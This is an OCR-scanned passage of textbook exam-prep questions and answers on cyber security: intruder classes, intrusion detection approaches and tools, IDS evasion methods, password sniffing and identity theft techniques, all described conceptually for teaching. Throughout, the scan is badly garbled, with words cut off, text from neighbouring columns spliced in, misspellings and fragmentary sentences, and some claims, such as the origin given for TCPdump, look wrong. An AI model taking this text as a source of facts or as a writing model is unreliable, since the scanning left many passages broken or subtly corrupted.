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"E What is intruder ? Explain three classes of intruders. 
1 " (R.GP.V., Dec. 2017) 
r 


3 classes of intruder. 
Or 


What is an intruder ? Describe its classification. (R.GP.V., Dec. 2015) 


Ans. One of the two most popular threats to security is the intruder (the 
ses), generally referred to as a hacker or cracker. An individual 
who gains, or attempts to gain, unauthorized access to a computer system or 
to gain unauthorized privileges on that system, is known as intruder. There 
are three classes of intruders — 

(i) Masquerader — An individual who is not authorized to use the 
who penetrates a system’s access controls to exploit a legitimate 


Explain the (R.GPV, Dec. 2006, 2012) 


other is viru 


computer and 
user's account. 

(ii) Misfeasor — A legitimate user who accesses data, programs or 
resources for which such access is not authorized, or who is authorized for 
such access but misuses his or her privileges. 

(iii) Clandestine User — An individual who seizes supervisory control 
of the system and uses this control to evade auditing and access controls or to 
suppress audit collection. 


Q.8. List and briefly define three classes of intruders. What are two 
common techniques used to protect a password file ? 
(R.GP.V., June 2005, Dec. 2011) 


Ans. Three Classes of Intruders — Refer to Q.7. 


Techniques Used to Protect a Password File — One way to thwart a 
password attack is to deny the opponent access to the password file. If the 
encrypted password portion of the file is accessible only by a privileged user; 
then the opponent cannot read it without already knowing the password of a 
privileged user; but this approach has several drawbacks. A more effective strategy 
would be to force users to select passwords that are difficult to guess. 


Q.9. What is an intrusion detection system (IDS) ? 
Or 
Discuss the concept of intrusion detection system. (R.GP.V., Nov. 2019) 


Ans. An intrusion detection system (IDS) is a system used to detect 
unauthorized intrusions into computer systems and networks. Intrusion 
detection as a technology is not new, it has been used for generations to 
defend valuable resources. Kings, emperors, and nobles who had wealth used 
it in rather an interesting way. They built castles and palaces on tops of 
mountains and sharp cliffs with observation towers to provide them with a 
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clear overview of the lands below where they could detect an 
intrusion ahead of time to defend themselves. 


Over the years, intrusion detection has been used by individuals A 


companies in a number of ways including erecting ways and fences aroun 


valuable resources with sentry boxes to watch the activities surrounding E 


premises of the resource. Individuals have used dogs, flood lights, de 
fences, and closed circuit television and other watchful gadgets to be i è 
detect intrusions. À l 

As technology has developed, a new industry based on intrusion de 
has sprung up. Security firms are cropping up everywhere to offer ind 
and property security-to be a watchful eye so that the property owner ca 
or take a vacation in peace. These new systems have been made to co 
changes, compare user actions agaist known attack scenarios, and be able to 
predict changes in activities that indicate and can lead to suspicious activities 


0.10. Discuss the best approaches to implementing an effective IDS. 

Or . 
Explain statistical anomaly and rule-based detection technique of 
intrusion detection. (R. GP, Dec. 20] 7) 


Y altem, 


tection 
ividua] 
n sleep 
nfigure 


Or 

Clearly differentiate between anomaly detection and signature detection 

techniques of IDS. (R.GP.V., June 201 7) 
Ans. The following approaches are used to implement an IDS — 


(i) Anomaly Detection — Anomaly based systems are learning 
systems in a sense that they work by continuously creating norms of activities, 
These norms are then later used to detect anomalies that might indicate an 
intrusion. Anomaly detection compares observed activity against expected 
normal usage profiles learned. The profiles may be developed for users, groups 
of users, applications, or system resource usage. 


In anomaly detection, it is assumed that all intrusive activities are 
necessarily anomalous. It happens in real life too, where most bad activities 
are anomalous and we can, therefore, be able to character profile the bad 
elements in society. The anomaly detection concept, therefore, will create, for 
every guarded system, a corresponding database of normal profiles. Any activity 
on the system is checked against these profiles and is deemed acceptable or 
not based on the presence of such activity in the profile database. 


Areas of interest are threshold monitoring, user work profiling, group 
Work profiling, resource profiling, executable profiling, static work profiling, 
adaptive work profiling, and adaptive rule base profiling. 

Anonymous behaviours are detected when the identification engine takes 
Observed activities and compares them to the rule-base profiles for significant 
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e profiles are commonly for individual users, groups of users, 


jations. Th d a collection of others as di 
e usages, and a collection of others as discussed below — 


pn resoure - "-— 

sys (a) Individual Profile —This is a collection of common activities 
cted to do and with little deviation from the expected norm. This 
ecific user events like the time being longer than usual usage, 
n user work patterns, and significant or irregular user requests, 


a user iS expe 
a cover SP A 
ecent changes ! i 
(b) Group Profile — This profile covers a group of users with a 
on work pattern, resource requests and usage, and historic activities. It is 
each individual user in the group follows the group activity patterns. 
(c) Resource Profile — This includes the monitoring of the use 
erns of the system resources like applications, accounts, storage media, 
at munications ports, and a list of many others the system manager 
lude. It is expected, depending on the rule-based profile, that 
ill not deviate significantly from these rules. 


n 


expected that 


protocols, com 
may wish to inc 
common uses W 

(d) Other Profiles — These include executable profiles that 
monitor how executable programs use the system resources. This, for example, 
may be used to monitor strange deviations of an executable program if it has an 
embedded Trojan worm or a trapdoor virus. In addition to executable profiles, 
there are also the following profiles — work profile which includes monitoring 
the ports, static profile whose job is to monitor other profiles periodically updating 
them so that those profiles, cannot slowly expand to sneak in intruder behaviour, 
and a variation of the work profile called the adaptive profile which monitors 
work profiles, automatically updating them to reflect recent upsurges in usage. 
Finally there is also the adaptive rule base profile which monitors historic usage 

, patterns of all other profiles and uses them to make updates to the rule-base. 
Beside being embarrassing and time consuming, the concept also has 

other problems. If we consider that the set of intrusive activities only intersects 
the set of anomalous activities instead of being exactly the same, then two 
problems arise — 

(a) Anomalous activities that are not intrusive are classified as 
intrusive. 

(b) Intrusive activities that are not anomalous result in false 
negatives, that is, events are not flagged intrusive, though they actually are. 

Anomaly detection systems are also computationally expensive because 


of the overhead of keeping track of, and possibly updating, several system 
Profile metrics, 


(ii) Misuse Detection — The misuse detection concept assumes that 
each intrusive activity is representable by a unique pattern or a signature so 
that slight variations of the same activity produce a new signature and therefore 
can also be detected. Misuse detection systems, are therefore, commonly 


| ae 


b «scl 


24 Cyber Security 


known as signature systems. They work by looking for a specific Signaty, 
on a system. Identification engines perform well by monitoring these Patte à 
of known misuse of system resources. These patterns, once Observeg E 
compared to those in the rule-base that describe bad or undesip, SR 
resources. To accomplish this, à knowledge database and a rule engine mug 
be developed to work together. Misuse p atiern analysis is best done by expe t 
systems, model based reasoning, or neural PE WORE : 
The major problems arise out of this concept are as follows — 
(a) The system cannot detect unknown attacks with unmapped 

and un-archived signatures. . 
(b) The system cannot predict new attacks and will, ther 


: ef 
k has occurred. This means that the syste E 


be responding after an attac m will 


never detect a new attack. 


Q11. Explain the following terms - Masquerader, Misfeasor, Clandestine 
user and Base-rate fallacy. Explain statistical anomaly detection method 
for intrusion detection. (R.GÈV, June 2019) 

Ans. Masquerader, Misfeasor and Clandestine User — Refer to Q7. 


Base-rate Fallacy — To be of practical use, an intrusion detection System 
should detect a substantial percentage of intrusions while keeping the false 
alarm rate at an acceptable level. If only a modest percentage of actual 
intrusions are detected, the system provides a false sense of security. On the 
other hand, if the system frequently triggers an alert when there is no intrusion 
(a false alarm) then either system managers will begin to ignore the alarms, or 
much time will be wasted analyzing the false alarms. 

Unfortunately, because of the nature of the probabilities involved, it is 
very difficult to meet the standard of high rate of detections with a low rate of 
false alarms. In general, if the actual numbers of intrusions is low compared 
to the number of lagitimate users of a system, then the false alarm rate will be 

. high unless the test is extermely discriminating. A study of existing intrusion 
detection systems, indicated that current systems have not overcome the 
problem of the base-rate fallacy. 


Anomaly Detection Method — Refer to Q.10 (i). 


Q.12. Describe various types of intrusion detection systems. 
(R.GP.V., Dec. 2016) 
Or 
Give different types of intrusion detection systems. (R.GP.V., June 2016) 


Ans. Intrusion detection systems can be classified based on their 
monitoring scope. That is, those that monitor only a small area and those that 


able usage op 
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monitor à wide area. Those that monitor a wide area are called as network- 
can ntrusion detection and those that have a limited scope are called as 


ed i à 
as ections. 


post-based deti 
(i) Network-based Intrusion Detection Systems (NIDSs) — Network- 
ed intrusion detection systems have the whole network as the 
bas e. They monitor the traffic on the network to detect intrusions. They are 
sP sible for detecting anomalous, inappropriate, or other data that may be 
ee d unauthorized and harmful occurring on a network. There are Sca 
differences between NIDS and firewalls. Firewalls are configured to allow is 
deny access to a particular service or host based on a Set of rules. Only when 
the traffic matches an acceptable pattern is it permitted to proceed regardless 
of what the packet contains. An NIDS also captures and inspects every packet 
that is destined to the network regardless of whether it’s permitted or not. If 
the packet signature, based on the contents of the packet is not among the 
acceptable signatures, then an alert is generated. 


monitoring 


There are many ways an NIDS may be run. It can either be run as an 
independent standalone machine where it promiscuously watches over all 
network traffic or it can just monitor itself as the target machine to watch 
over its own traffic. For example in this mode, it can watch itself to see if 
someone is attempting a SYN-flood or a TCP port scan. 


While NIDSs can be very effective in capturing all incoming network 
traffic, it is possible that an attacker can evade this detection by exploiting 
ambiguities in the traffic stream as seen by the NIDS. Mark Handley, Vern 
Paxson, and Christian Kreibich list the sources of these exploitable ambiguities 
as follows — 

(a) Several NIDSs do not have complete analysis capabilities to 
analyze a full range of behaviour that can be exposed by the user and allowed 
by a particular protocol. The attacker can also evade the NIDS even if the 
NIDS does perform analysis for the protocol. 

(b) Since NIDSs are far removed from individual hosts, they 
do not have full knowledge of each host’s protocol implementation. This 
knowledge is necessary for the NIDS to be able to determine how the host 
may treat a given sequence of packets if different implementations interpret 
the same stream of packets in different ways. 

(c) Again, since NIDSs do not havea full picture of the network 
topology between the NIDS and the hosts, the NIDS may be unable to determine 
whether a given packet will even be seen by the hosts. 

(ii) Host-based Intrusion Detection Systems (HIDS) — Host-based 


intusion detection is the technique of detecting malicious activities on a singi 
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comput : . i 2 
Puter. A host-based intrusion detection system, is therefore, de 


a sin : : plo 
a E target computer and it uses software that monitors operating ces On 
Pecific logs including system, event, and security logs on Windows Med 
em; 


and syslog in Unix environments to monitor sudden changes in thes 
When a change is detected in any of these files, the HIDS compares ihe ` 
log entry with its configured attack signatures to see if there is a match * 
match is detected then this signals the presence of an illegitimate activity ^ 


Although HIDSs are deployable on a single computer, they can also be 
Put on a remote host or they can be deployed on a segment of a Network to 
monitor a section of the segment. The data gathered, which sometimes can be 
overwhelming, is then compared with the rules in the organization’s Securi 
policy. The main problem with HIDSs is that given the amount of data logs 
generated, the analysis of such raw data can put significant overhead not only 
on the processing power needed to analyze this data but also on the Security 
staff needed to review the data. 

Host sensors can also use user level processes to check key system files 
and executables to periodically calculate their checksum and report changes in 
the checksum. 


Q.13. What do you mean by intrusion ? Explain types of IDS detection 
techniques. (R.GP.K., Dec. 2013) 


Ans. Refer to Q.6 and Q.12. 


Q.14. What is an IDS ? Explain the different types of IDS in brief. 
(R.GP.V., Dec. 2010, June 2011) 
Ans. Refer to Q.9 and Q.12. 


Q.15. Explain the architecture of a distributed intrusion detection 
system. Give the major issues in the design. (R.GP.V., June 2012) 


Ans. Architecture of a Distributed Intrusion Detection System - 
The architecture of a distributed intrusion detection system consists of three 
main components as shown in fig. 2.7. 


(i) Host Agent Module — An audit collection module operates as a 
background process on a monitored system. Its aim is to gather data on security 
related events on the host and send these to the central manager. 


(ii) LAN Monitor Agent Module — It operates in the same manner 
as a host agent module except that it analyzes LAN traffic and sends the 
results to the central manager. 


(iii) Central Manager Module — It gets reports from host agents 
and LAN monitor and processes and correlates these reports to detect intrusion. 


cC-— 
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LAN Host 
Monitor 


Agent 
Module 


Manager 
Module 


Agent 
Module 


Fig. 2.7 Architecture for Distributed Intrusion Detection 


Major Issues in the Design of a Distributed Intrusion Detection 
System — The following are the major design issues in a distributed intrusion 
detection system — 

(i) The architecture can be either centralized or decentralized. There 
is a single central point of collection and analysis ofall audit data in a centralized 
architecture. This simplifies the task of correlating incoming reports but creates 
a potential bottleneck and single point of failure. On the other extreme, there 
are more than one analysis centers in a decentralized architecture, but these 
must coordinate their activities and exchange information. 

(ii) There is one or more nodes in the network that will serve as 
collection and analysis points for the data from the systems on the network. 
Therefore, either raw audit data or summary data must be sent across the 
network. Hence, there is a need to assure the integrity and confidentiality of 
these data. Integrity is needed to prevent an intruder from masking his or her 
activities by altering the transmitted audit information. Confidentiality is needed 
because the transmitted audit information could be valuable. 

(iii) A distributed intrusion detection system may require to deal with 
different audit record formats. In a heterogeneous environment, different 
systems will use different native audit collection systems and, ifusing intrusion 
detection, may use different formats for security-related audit records. 


Q.16. What are file system indications for a possible intrusion ? 
Ans. File system has new file and directories, missing files, altered file 


data, MDS sum or shalsummismatches, new getuid programs and rapidly 
growing or overflowing file systems. 


OU 


28 Cyber Security 


New Files and Directories — There can be file with bad digital si 
and multiple new file and directoreis. File name will be very suspic 
starting with one or more dots and legitimate-sounding file name appi 


Bnatureg 
lous like 
caring in 
unappropriate places. 

Missing Files — Some type of difficulties indicated by missing files 
particularly log files. 

Setuid and Setgid Programs - New set uid and set gid files are a right 
place to start looking the problems. 

Rapidly Changing Filessystem Sizes — Rapidly changing file system 
sizes may be a sign of a hacker's monitoring program producing large logfiles, 

Update Public File Archives — Check the contenrs of your web and 
FTP areas for updated files. 

Q.17. Discuss the various intrusion detection tools. (R.GP.V., June 20] 2) 

Or 
Briefly explain available tools of intrusion detection. 
(R.GP.V., Dec.2016) 

Ans. Intrusion detection tools work best when used after vulnerability 
scans have been performed. They then stand watch. Table 2.1 shows various 
current ID tools. 

Table 2.1 Some Current ID Tools 


Realsecure v.3.0 ISS 

Net Perver 3.1 Axent Technologies 
Net Ranger v2.2 CISCO 
FlightRemohe v2.2 NFR Network 
Sessi-Wall-3, v4.0 Computer Associates 


Kane Security Monitor Security Dynamics 


All network-based intrusion detection tools can provide recon (reconaince) 
probes in addition to port and host scans. As monitoring tools, they give 
information on — 

(i) Hundreds of thousands of network connections 

(i) External break-in attempts 

(iii) Internal scans 

(iv) Misuse patterns of confidential data 

(v) Unencrypted remote logins or a Web sessions 

(vi) Unusual or potentially troublesome observed network traffic 


| — — 


Unit - Il 29 


information is gathered by these tools monitoring network 


this 
ine and services that include — 


onents 
come (i) Servers for 


(a) Mail (b) FTP (c) Web activities. 

(ii) DNS, RADIUS and others 

(iil) TCP/IP ports 

(iv) Routers, bridges, and other WAN connection 

(v) Drive Space 

(vi) Event log entries 

(vii) File modes and existence 

(viii) File contents. 

In addition to the tools in table 2.1 several other commercial and freeware 
IDS and scanning tools can be deployed on a network to gather these probes. 
The most common are as follows — 

(i) Flow-tools — A software package for collecting and processing 
NetFlow data from Cisco and Juniper routers. 

(ii) Tripwir — Monitors the status of individual files and determines 
whether they were changed. 

(iii) TCPdump — A freeware and one of the most popular IDS tool 
created by National Research Group. 

(iv) Snort— Another freeware and popular intrusion detection system 
that alerts and reassembles the TCPdump format. 

(v) Portsentry — A port scan detector that shuts down attacking 
hosts, denying them access to any network host while notifying administrators. 
: (vi) Dragon IDS — Developed by Network Security Wizards, Inc.it 
1s a popular commercial IDS. 

(vii) TCP Wrappers — Logs connection attempts against protected 
services and evaluates them against an access control list before accepting the 
connection. 


Ds (viii) RealSecure — By Internet Security System (ISS). Very popular 


(ix) Shadow — The oldest IDS tool. It is also a freeware. 


TP (x) NetProwler — An intrusion-detection tool that prevents network 
Tusions through network probing, system misuse, and other malicious 

activities by users, 

(xi) Network Auditor — Yt gives the power to determine exactly what 


h Es 
ardware and software is installed on the network and checks this for faults 
9r changes, 


| -—L 
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Q.18. What are the different methods of evading IDSs ? 


Ans. IDSs can be thwarted or bypassed by a number of methods, Th 
principal methods used are — e 
(i) Session Splicing — In session splicing, the data to be deliver, 
for the attack is spread out over multiple packets, thus making it more ditio] 
for pattern matching techniques to detect an attack signature. Session splicing 
is characterized by a steady stream of small packets. Tools such as Nese 
and Whisker incorporate session splicing methods. s 


(ii) Fragmentation Overlap — This approach attempts to foil an 
IDS by transmitting packets in a fashion that one packet fragment OVerwrites 
data from a previous fragment. The information in the packets is Organized 
such that when the packets are reassembled, an attack string is sent to the 
destination computer. 

(iii) Fragmentation Overwrite — In this fragmentation attack, the 
total fragment data of one packet overwrites a previous fragment. When the 
target host assembles the fragments, an attack string results. 

(iv) Denial of Service — A DoS attack against an IDS attempts ty 
flood the IDS so that it cannot function properly. The IDS will be consumed 
with the overwhelming traffic, allowing malicious code to slip through. Another 
effect is that a large number of alarms will be generated that cannot be 
processed by the alarm handling management systems. 


(v) Insertion — In an insertion attack, an IDS accepts a packet and 
assumes that the host system will also accept and process the packet. In fact, 
the host system will reject the packet. The IDS will, then, accumulate attack 
strings that will exploit vulnerabilities in the IDS and, for example, contaminate 
the signatures used in signature analysis. 


(vi) Evasion — An evasion attack is the opposite ofan insertion attack 
in that a packet is rejected by an IDS, but accepted by the host system. 
Because the IDS rejects the packet outright, it does not checks the packet 
contents. The packet can contain data that is used to exploit the host system. 


(vii) Obfuscating Attack Payload — If the attack payload in a packet 
is encoded or obfuscated, the IDS will not recognize the payload as an attack 
and pass it on the server for decoding. For example, the attack data could be 
encoded with Unicode. 


(viii) Polymorphic Code — If a continually changing signature is 
generating by encoding the attack payload with a polymorphic code, this 
signature would not match a signature in the attack signature database. 
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0.19 Write short note on sniffing. (R.GP.V., Dec. 2003, June 2004) 
"P Or 


what is sniffing ? (R.GP.K., Dec. 2015) 
Ans. Sniffing is the act of collecting packets from a network connection 
-s either à special application or a piece of hardware called a sniffer. A 
using takes a copy of and displays all of the traffic a network card sees. 
sniffer plemented correctly, a sniffer is completely passive, having no effect 
pes traffic. Except for the fact that it takes processing time and memory, a 
ont e should have no effect on its host computer. Ethereal, Ettercap, and 
s er are some popular sniffers that allow for traffic collection, analysis, 
TCP stream reconstruction. Traffic collection refers to the sniffer's ability 
$ receive a copy of network traffic. Traffic analysis is the sniffer’s ability to 
break out relevant fields (such as IP address) from the captured packets. A 
sniffer with good traffic analysis capabilities can easily be display specified 
fields within the packet. It will also be able to recognize many different types 
of packets. Some even have the capability to analyze proprietary packet types. 
TCP stream reconstruction is the process by which a sniffer captures and 
reconstructs an entire TCP stream so that the user can see and analyze the 
traffic in an easy-to-understand manner. Some sniffers allow for almost 
complete stream reconstruction. They can pull out the data that is being passed 
within the traffic. This allows reconstruction of the sequence of mail commands 
that is passed between a mail host and a client, thus enabling debugging of the 
higher level protocols. For instance, SMTP could be debugged with the help 
ofa sniffer. Sniffing is done for many reasons, with two of the most common 
being network performance analysis (boring) and spying. Sniffing will be 
used as a tool to further our spying capability. 


Q.20. What are the types of sniffing ? 

Ans. Protocol analyzers or packet sniffers come in two types — general 
and attack. A general packet sniffer captures all packets and sometimes has 
diagnostic tools to help you examine and troubleshoot packet contents and 
connections. There are many free software versions of these types of sniffers 
available. One of my favourite free sniffers is WireShark. An attack sniffer, on 
the other hand, is a modified form of a general packet sniffer. An attack sniffer 
is only looking for certain kinds of packets, like the authentication information 
in telnet packets, or credit card information in HTTP connections. Basically, 
the attacker has modified the software of a general sniffer to capture specific 
kinds of traffic that will be useful for other types of attacks. 


Q.21. Write a short note on password sniffing. (R.GP.V., Nov. 2018) 


T Ans. Password sniffing is an attack on the Internet that is used to steal 
‘mame and password from the network. It was the worst security problem 
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on the Internet in 1990s. In 1990s every week there was a news about pa, 


PAR Out Passw 
sniffing attack. Since now-a-days strong encryption is used for pr or 
passwords, so it was mostly of hist 


orical interest. Otecting 
Password sniffing can also be termed as network sniffing. It T 
intercepting, monitoring and capturing of data packets in traffic ofa ies o 
especially in Local Area Network (LAN). The motive of network sniff 
steal information such as usernames, passwords, network Messages 
form of packets using à sniffer software program like wireshark, Anothe 
mean of passive attack is network sniffing, to abstract useful information ik 
Internet Protocol (IP) address ranges, hidden servers or networks, and othe 
available services on the system or network. T 
The password sniffing problem was mostly solved by SSH, which replace 
several prior insecure protocols. Hashing of passwords or encryption has also 
been introduced by many other protocols, which makes password Sniffing 
attack less practical. Even then various other credentials stealing and replay 
attacks are still widely used. Man-in-the-middle attack is being commonly 
r stealing passwords and credentials today. 


Ng ig 
etc, i 


used foi 

Q.22. How can the password sniffing be implemented ? What are the 
complications of password sniffing ? 

Ans. The typical implementation of a password sniffing attack involves 
gaining access to a computer connected to a local area network and installing 
a password sniffer on it. The password sniffer is a small program that listens 
to all traffic in the attached network(s), builds data streams out of TCP/IP 
packets, and extracts user names and passwords from those streams that 
contain protocols that send cleartext passwords. 

In network sniffing attack, the data from each TCP/IP stream can be 
separated and the information can be extracted from them. It is not difficut 
attack to code. 

This attack can also be applied on switches, routers and printers. Now-# 
days it is common for attackers to install presence on such devices. They 
don’t run antivirus and are not easy to audit. Since, traffic naturally goes 
through switches and routers, so no extra network packets need to be sent to 
fool switches into sending traffic of interest to the listening node. 


Complications of Password Sniffing — Many developments have mak 
password sniffing difficult besides adding encryption. Even though the encrypti 
is the only reliable solution, and due to main-in-the-middle attack risks, the 
encryption must include proper authentication of communicating parties. — 

In 1990s every host was able to see all traffic in the network because 0 
thick ethernet cable that was common at that time. So it was enough t0 put’ 


i — asd 
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interface into casual mode to see all traffic. Switches and star-like 
erwork 10 are used by networks today, which make this more difficult. 
e it is possible to fool switches to send traffic to any host, or perform 
> on the switch itself. 
MAC addresses for each network port in switches are hard-coded by 
enterprises and updates and passwords are set on Switches. Some 
some ations make this attack difficult. However, it is impossible to control 
ppm and routers on long-distance connections. 
al 


0.23. What do you mean by identity theft ? 

Ans. When someone claims to be someone else to steal money or get 
other benefits then this fraud is referred to as identity theft. When someone 
else's identity is used by a criminal or a fraud person then this theft occurs. 
The person, can face various problems when he/she is held responsible for 
the criminal’s action, whose identity is used. For personal gain using another 
person’s id is declared as crime by some specific levels, in many countries. In 
India, it is also a punishable offense under the section 66C and section 66D 
under Indian IT Act. 

A non-profit organization was formed in the US, with the objective to 
support the society for spreading awareness about ID theft fraud because of 
it's severity. This organization was named as Identity Theft Resource Center 
(ITRC). 

In 2010, a report was published by Javelin strategy in his research paper 
that the number of identity fraud victims were increased by 12% during 2009, 
and amount of fraud increased by 12.5%. 


owevel, 
the attack on 


The statistics was provided by Federal Trade Commission (FTC) about 
the identity fraud in which prime frauds was mentioned is given below — 


(i) Loan Fraud — The loan fraud was 5% at that time. When a loan 
is applied on victim’s name by attacker then this fraud occurs. 


(ii) Government Fraud — There are 9% of government frauds which 
include SSN, driving license and income tax fraud. 


(iii) Employment Fraud — There are 12% of employment frauds 
Where the attacker borrows the victim’s valid SSN. 


i (iv) Bank Fraud — Besides credit card frauds, ATM and cheque 
Tauds have been reported. There are 17% of bank frauds. 


as (v) Credit Card Frauds — There are 26% of credit card frauds. These 
3 : ighest rated frauds, In this fraud the victim's credit card number is acquired 
> Someone else and used for making purchase. 
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Q.24. What a person can do to protect himself/herself from iden 

tiny 

theft ? Su GRE, Now, 2079" 

Ans, Since our identity and/or personal informations are displayed on i 

internet everevtyme, so we can be a victim of identity theft or fraud. the 


s ir identity and/or prote K id. Henge 
Internet users should erase their identity protect their ID, a 
information about them, availa 


ble on the Internet. Since, it is impossible i 

a tool that erase all informations completely from the Internet, so a person B 

do the following to protect himself/herself from identity theft — n 
(i) Monitoring of Credit ~ The information about our credit accoun, 

and bill payment history are contained in the credit report, so someone = 

impersonate us. So we should aware for suspicious signs. The identity protection 

services. can also be used for extra security, which ranges in credit monitoring 


to database scanning. 
Gi) Using Update Web Browser — An update web browser should be 


used everytime to make sure that we are taking advantage of its current Safety 
features. 

(iii) Keeping Records of Financial Data and Transactions — Our 
statements should be reviewed time to time for any activity and change that 


we have not made. 

(iv) Installing Security Software = We should install antivirus ang | 
antispyware softwares, and keep these security softwares upto date as a safety 
measure against online intrusions. 

(v) Storing Sensitive Data Securely — We should keep our online | 
sensitive information secured. We can store these online information sucurely | 
by using file encryption software. 

(vi) Protecting Our Personally Identifiable Information — We should | 
not provide our personally identifiable information to any other person. We | 

should provide these informations after finding out that why the information is 
needed and it is needed to provide or not. We should carefully share our 
personal information on social networking sites. 

(vii) Staying Alert to the Latest Scams — We should be aware to | 

protect against fraud. We should also create awareness in our family and | 
surroundings by sharing security tips with everyone. | 


Q.25. Write a short note on personally identifiable information (PII). | 


Ans. The attacker always try to find the information by using which a 
single person can be located, contacted or identified or by using which 
single individual can be uniquely identified out of other sources. Personally 
identifiable information is based on four common types viz., personal, 
personally, identifiable and identifying. | 


| - 
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s given below are attempted to be stolen. These elements can 


ts g regi Sepak 
e (pan of distinguishing individual identity — 
xpress! Full name of user 
(ii) Residence and office telephone number and mobile number 
(ii) PAN card number 
(iv) Credit/Debit card number 
(v) D.O.B. 
vi) Driver's license number 
(vii) E-mail address/Online account details etc. 
ds personally identifiable information can also be divided into two 
ries aS 7 " 
categ p Classified Information — The subcategories of classified 
. formation are — À : T 
inform: (a) Secret — National security policies, military plans etc. are 


rmations. The disclosure of these informations can damage the 
urity. So these informations require protection. 

(b) Top Secret — Information that need very high protection 
d unauthorized disclosure could severely damage national security e.g., vital 


secret info 
national sec 


defense plans. . 
(c) Confidential — Information about strength of armed forces 


and other technical information related to police/CBI etc. are confidential 
information. The disclosure of these information to an unauthorized person 
may damage national security. 

(ii) Non-classified Information — The subcategories of non-classified 
information are — 

(a) Confidential Business Information — Sales and marketing 
plans, new product plans etc. are confidential business information. If these 
informations get disclosed then it may give loss in business. 

(b) Routine Business Information — The business information 
that can be shared inside or outside of the business time to time and do not 
require any special protection. 

(c) Private Information — The credit card details, debit card 
details etc. are private information. These information can be associated with 
an individual. 

(d) Personal Information — The informations such as e-mail 
ID, addresses, phone numbers, mobile numbers etc. are personal information. 
These informations belong to a private individual but can be shared with others 
for business or other purposes. 

: (e) Public Information — The information that is publically 
available or matter of public knowledge. 
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0.26. Explain the types of identity theft. 

Ans. Since the identity of someone is stolen for commit 
There are many types to which identity theft is related. Some o 
follows — 


ling a Crime 

f ther s. 
m 

are ag 


(i) Financial Identity Theft The US Secret Service ha 
25 types of financial identity thefts in total. Bank fraud, credit ca 
fraud etc. are financial identity thefts. When someone else’s iden 
such as name, address, bank account details, etc. are used by 
commit fraud that is applicable on victim’s finances e.g., ne 
accounts can be opened in the name of victim and the card charges Up, pa 
is neglected, leaving the victim with bad credit history and large sue 
debt. Sometimes the fraudsters are able to open a new bank ae of 
completely taking over the victim's identity. He/she can purchase a veli $ 
can get a mortgage loan etc. by using victim’s identity. icle, 


S Investi e 
rd fraud, m 
tifying detail, 

fraudsters t 
W credit Car 


Ee i 


To get recover from this crime expensive, time consuming and Sometim 
es | 


psychologically painful. A fraudster may be capable to spend thousands 
lakhs of rupees, before the crime is detected, in victim’s name. 0 


(ii) Criminal Identity Theft — To commit a crime such as enterin 
into a country, and any terrorist activity, by taking over someone else's idea i 
is known as criminal identity theft. Computer and cybercrimes, organized 
crime, drug trafficking, alien smuggling and money laundering can also be 
included in this crime/criminal activity. 

The identity theft is always not for stealing money or to destroy victim’s 
credit. When a fraudster uses victim's name upon arrest/during a criminal 
investigation. The fraudster may provide counterfeited information to lay 
enforcement officer. What warrant has been issued in his/her name, the victim 
of criminal ID theft may not know this for a long time. 


(iii) Identity Cloning — The frightened variation of all identity theft is 


identity cloning. The cloning of identity compromises the victim’s life by actually | 


living and working as victim, besides of stealing the personal information for 
financial gain or committing crimes in the victim’s name. However cloner of ID 
may pay bills regularly, get engaged and even got married. It means that like 
victim’s life, fraudster may live natural and usual life may be at a different location, 

As much information as possible are obtained by an identity cloner. They 
will try to find all information related to the victim such as in which city or 
state the victim was born, in which street he/she lives, where he/she attended 
the school, how many members are there in his/her family etc. 


(iv) Business Identity Theft — The information about the business! 
organization privileged in nature and/or proprietary information which, vue 
compromised through alteration, corruption, loss, misuse or unauthorize 
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could Cause" big damage to the organization, is known as business 
di os formation (BSD. 
a" acr: pie Bust-out sa scheme that fraudsters use. In 
pu individual's ID theft it is paid less importance, A space is rented by 
m “ie same building as victim's office. After that corporate credit 
: peus icy n neni Since the company's name and 
atches, the application passes credit check, but the cards are delivered 
ilbox. These cards are used by fraudster and destroyed bef 


er's ma = 
dster’S to know that the firm’s credit is badly damaged. li 


s jm comes : 

() Medical Identity Theft — Now-a-days, India has become famous 
dical tourism. Because reasonable priced in medical services and good 
for me i dia has made name so many tourist visit India every year with dual 
quality, iie the country plus getting their medical problems attended to. 


se : i 
pe housands of medical records of foreigners as well as locals are created in 
e 


this process. "A ] 
Healthcare facilities now are very different compared to how they were 


sed before. When multiple agencies are connected over computer networks 
5 d Internet, these are great opportunities for protected health information (PHI). 
Now the bulky paper records are changed to faster and easier file and trace 
electronic records by medical facility providers, even though the concept of 
medical ID theft is growing. The people who need the stolen information they 
buy it from fraudsters or fraudster can use it this information for other purposes. 
Ifthe victim's identity is successfully stolen by a fraudster and he receives 

the treatment, then this becomes the part of victim's permanent medical record. 


(vi) Synthetic Identity Theft — In this theft, the fraudster takes some 
part of information from many victim's identity and combine them to generate 
a new ID, which is not of a specific person. But this can affect all the persons 
whose information is used. This is an advanced form of identity theft. 

(vii) Child Identity Theft — The identity of child is theft by their 
parents to open bank accounts, credit card accounts or even to take out loans 


because their own credit history is too damaged or not sufficient. This theft is 
known as child identity theft. 


0.27. Describe the various techniques of identity theft. 
Ans, The techniques of identity theft are given below — 


" () Traditional/Human-based Methods — In this technique there is 
à des of technology, and/or minimal use of technology. Following are 
Ubcategories of human based methods — 


(a) Direct Access of Information — People who are very much 


trusted p PNIS 
y the victim's such as peon, friends, relatives, roommates etc. can 


n 


ln. 
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obtain an authorized access to a business or residence to steal the peg, 
information. ea Wing 
ing- Retrieving the documents by look: 
en on pieces of paper. In this the bis. 
find useful free items, It js also Bes 
ed 


(b) Dumpster Div 
into the trash for information writt 
or residential trashes are rummaged to 


binning, trashing, dumpsterin£- — — 
(c) Wallet Theft — Pickpockets et E 9n a public pi. 

; llets and sell the personal information recgj " 

or in street to steal the wa! dhar card, PAN card, driving lic Ved fro; 


wallet, Our wallet often contains 2 


debit card etc. ; l 
(d) Mail Theft and Rerouting — Since the mailbox has so 
security mechanism, SO it is easy to steal mails from it and all fone 
which are freely available to the fraudster. 
(e) Shoulder Surfing — Peoples who are stan ding in - 
fes, near ATMs to keep watch over a person's 


h as in cyberca 
nto the system and grab personal information 


ense, crediy 


facilities suc! 


shoulder while he/she logs i i i 
(f) Skimming - It is possible to install a mini equipment € 


to imitate an ATM. Card informations are captured by this 


valid ATM, just as i 
vali J d to make duplicate cards. The PIN can be obtained b 


equipment and use 


stealing the films of camera. 
(g) Dishonest or Mistreated Employees — The personal files 


salary information, bank information etc. can be accessed by an employee o; 
partner, to gather all type of confidential information. The fraudster then can 
ient damage by using these informations. 

